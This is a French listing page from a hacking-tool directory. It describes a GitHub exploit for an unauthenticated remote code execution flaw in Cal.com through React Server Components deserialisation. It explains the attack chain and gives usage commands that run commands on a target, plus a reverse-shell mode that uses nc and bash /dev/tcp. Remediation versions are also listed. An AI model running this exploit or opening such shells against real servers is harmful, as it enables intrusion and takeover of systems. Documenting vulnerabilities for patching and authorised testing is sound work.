Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-71389_exploit | Kitploit
Outils/GitHubGitHub/0xdak/cve-2025-71389_exploit
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHub0xdak/cve-2025-71389_exploit

CVE-2025-71389_exploit

Voir le dépôt
il y a 23 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-71389 — RCE non authentifiée sur Cal.com (react2shell)

Exécution de code à distance non authentifiée dans Cal.com <= 5.9.8 via la faille de désérialisation "Flight" des composants serveur React — "react2shell" (CVE-2025-55182 dans React, CVE-2025-66478 dans Next.js).

Cal.com embarque un Next.js 15.x vulnérable. Une seule requête non authentifiée POST / accompagnée d'un en-tête Next-Action et d'une charge utile Flight multipart fabriquée parcourt une chaîne de pollution de prototype (__proto__:then + constructor:constructor) jusqu'à un eval côté serveur, atteignant child_process.execSync. La sortie de la commande est renvoyée directement dans le champ digest de l'erreur RSC. Aucune authentification, aucune interaction utilisateur — une seule requête conduit à une RCE.

  • Affecté : Cal.com <= 5.9.8 (Next.js 15.x / 16.x App Router avec RSC)
  • Corrigé dans : Cal.com 5.9.9 (met à jour le Next.js embarqué)
  • Port par défaut : 3000
  • CWE : 502 / 94
  • Sous-jacent : CVE-2025-55182 (React), CVE-2025-66478 (Next.js)

Prérequis

root@kitploit:~
pip install requests

Utilisation

root@kitploit:~
# one-off command (output comes back in the response)
python3 exploit.py http://10.10.10.10:3000/ -c 'id'
python3 exploit.py http://10.10.10.10:3000/ -c 'cat /root/proof.txt'

# interactive reverse shell (start `nc -lvnp 4444` first)
python3 exploit.py http://10.10.10.10:3000/ --shell 10.10.14.5:4444

La commande ponctuelle renvoie sa sortie directement via le digest de l'erreur RSC. Le mode --shell déclenche un reverse shell bash /dev/tcp détaché par setsid (le conteneur cible est sous Debian et fournit bash).

Remédiation

Mettez à niveau Cal.com vers >= 5.9.9 (tout Next.js corrigé : 15.0.5 / 15.1.9 / 15.2.6 / 15.3.6 / 15.4.8 / 15.5.7 / 16.0.7). N'exposez pas le gestionnaire de fonctions serveur RSC à des clients non fiables et ne lancez pas le conteneur de l'application en tant que root.

Avertissement

Réservé aux tests de sécurité et à l'éducation autorisés. Utilisez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous avez explicitement l'autorisation de tester.

Télécharger l’outil